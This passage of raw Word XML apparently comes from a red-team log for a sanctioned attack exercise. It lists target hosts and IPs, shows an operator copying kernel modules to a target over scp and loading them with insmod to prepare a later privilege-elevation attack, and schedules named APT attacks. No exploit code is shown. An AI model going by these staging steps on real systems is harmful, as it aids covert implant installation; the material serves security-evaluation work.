        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_t2trxwhyqli5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="113" w:name="_Toc12600060"/>
      <w:bookmarkEnd w:id="112"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="06572E31" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-clearscope-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.54</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Android 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5993C6F8" w14:textId="0F3F7E71" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_2i8tvjd2jb2e" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="115" w:name="_Toc12600061"/>
      <w:bookmarkEnd w:id="114"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="154508A4"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 xml:space="preserve">BarePhone </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14692850"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Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D74BF96" w14:textId="6C1ECBCE" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc12600062"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>20:32 -- TA1 THEIA 3 -- Benign Activity (BinFmt-Elevate Setup)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="02E6CDAA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Setup the BinFmt Elevate driver on THEIA 3 after engagement hours in preparation for an attack later in the week.  This is considered benign activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CA316" w14:textId="400E0209" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_l5d8v1w4zlab" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="118" w:name="_Toc12600063"/>
      <w:bookmarkEnd w:id="117"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w14:paraId="41B962E7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-theia-3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.119</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Ubuntu 12.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001415A8" w14:textId="4A17EE52" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_81hzwpnm71rb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="120" w:name="_Toc12600064"/>
      <w:bookmarkEnd w:id="119"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="1D8F8A6D"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BinFmt-Elevate Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BE3A83" w14:textId="3C5FB11E" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_3twzawllj766" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="122" w:name="_Toc12600065"/>
      <w:bookmarkEnd w:id="121"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign Activity Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w14:paraId="6AD77C91"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20:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D2C3BB"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kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist$ scp load_helper_theia.ko admin@128.55.12.119:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BABBCEB"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The authenticity of host '128.55.12.119 (128.55.12.119)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267B5100"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ECDSA key fingerprint is 2d:81:fb:53:3e:7f:a6:20:f9:77:06:b0:df:95:7a:6b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF275E"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Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F62E19"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Warning: Permanently added '128.55.12.119' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39532C9B"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admin@128.55.12.119's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E300A4"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load_helper_theia.ko                                                                                                                                100%  175KB 175.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C6541"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kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist$ scp read_scan_theia.ko admin@128.55.12.119:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E521A4"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admin@128.55.12.119's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48485ECE"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read_scan_theia.ko                                                                                                                                  100%  176KB 175.8KB/s   00:00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B69D097" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4573FCD5"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20:32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB75844"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kududyn@kududyn-ProLiant-SL170s-G6:/e5/dist$ ssh admin@128.55.12.119</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1D6DC"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admin@128.55.12.119's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205C8B91"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Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.5.0-99-generic x86_64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196304C2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BA3A1B"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 * Documentation:  https://help.ubuntu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3153D70E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="786E053B"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  System information as of Wed May 15 00:32:18 Local time zone must be set--see zic manual page 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCB9DC6" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="317079CA"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  System load:  0.05                Processes:           176</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FD1173"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  Usage of /:   14.6% of 115.37GB   Users logged in:     1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0193452B"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  Memory usage: 10%                 IP address for eth0: 10.0.6.69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D134AD"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  Swap usage:   0%                  IP address for eth1: 128.55.12.119</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE9137" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A75AB15"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  Graph this data and manage this system at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F311A58"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    https://landscape.canonical.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CC9A62" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594B512E"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New release '14.04.5 LTS' available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397638AA"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Run 'do-release-upgrade' to upgrade to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07689B44" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53193A72"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Your current Hardware Enablement Stack (HWE) is no longer supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E410D7"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since 2014-08-07.  Security updates for critical parts (kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D66D164"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and graphics stack) of your system are no longer available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B8F2B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B30340B"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For more information, please see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33497884"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http://wiki.ubuntu.com/1204_HWE_EOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A136CC" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57BFF797"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There is a graphics stack installed on this system. An upgrade to a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A40A1"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supported (or longer supported) configuration will become available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE6C75"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on 2014-07-16 and can be invoked by running 'update-manager' in the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F383AC"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Dash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F15AF"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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF96E4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0C8B22"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Last login: Wed May 15 00:31:54 2019 from ta1-marple-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E427D2D"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admin@ta1-theia-target-3:~$ ls       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C921C8"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Desktop    Music     Templates  docs                files            hosts             load_helper_theia.ko  nodeexporter  out857  out912              test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A21C7DA"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Documents  Pictures  Videos     dot_mozilla_pre_e5  glx_alsa_675.ko  hsperfdata_darpa  minion                out20         out864  passwd              work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFCDA00"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Downloads  Public    backup     examples.desktop    grains           jna-95354950      monoxide              out249        out892  read_scan_theia.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4409BE"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admin@ta1-theia-target-3:~$ mv load_helper_theia.ko load_helper.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C368C67"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admin@ta1-theia-target-3:~$ mv read_scan_theia.ko read_scan.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B4FEBF"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admin@ta1-theia-target-3:~$ sudo insmod ./load_helper.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719DA91F"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sudo] password for admin: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486DEBE5"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Sorry, try again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF7DBE"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sudo] password for admin: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5387BBC9"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admin@ta1-theia-target-3:~$ sudo insmod ./read_scan.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193BFF17"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admin@ta1-theia-target-3:~$ lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB5CC81"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Module                  Size  Used by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32733EB7"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read_scan              12510  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A39C1C2"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load_helper            12516  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CAE9B2"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floppy                 69407  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577430AC"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mac_hid                13206  0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C1C9D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77627C9D"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20:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18537B1D"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Ran elevate jenkins job to install glx_alsa_675.ko on ta1-theia-target-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BD1CF0" w14:textId="7A1BDFD8" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00CE2C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A674C65" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00CE2C66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203AF59C" w14:textId="0C602E8E" w:rsidR="00CE2C66" w:rsidRPr="00FC027E" w:rsidRDefault="00CE2C66" w:rsidP="00CE2C66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc12600066"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>05/15/2019 –</w:t>
      </w:r>
      <w:r w:rsidR="004C28E0">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> New Elevate, Inject, and Android Apps</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="469D32FE" w14:textId="006EAF3E" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc12600067"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Schedule</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12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475"/>
        <w:gridCol w:w="5865"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="1F196077" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="17BA1145"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10:22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5835331F"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TA1 ClearScope 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0BF708CD"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Benign Activity (Screencap APK, Failed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="47951BB5" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2B966D5A"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13:15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="44EDF168"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TA1 FiveDirections 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77530935"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Firefox BITS Micro APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="637B20E4" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E54C67F"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14:14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="554FC483"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TA1 ClearScope 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7032AF47"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Barephone Micro APT (Failed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="0F14A008" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05A9AC77"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14:48</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5949F858"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TA1 THEIA 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5865" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05C91AC5"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Firefox Drakon APT BinFmt-Elevate Inject</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A351B2" w:rsidRPr="00FC027E" w14:paraId="6189B482" w14:textId="77777777" w:rsidTr="006C3099">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
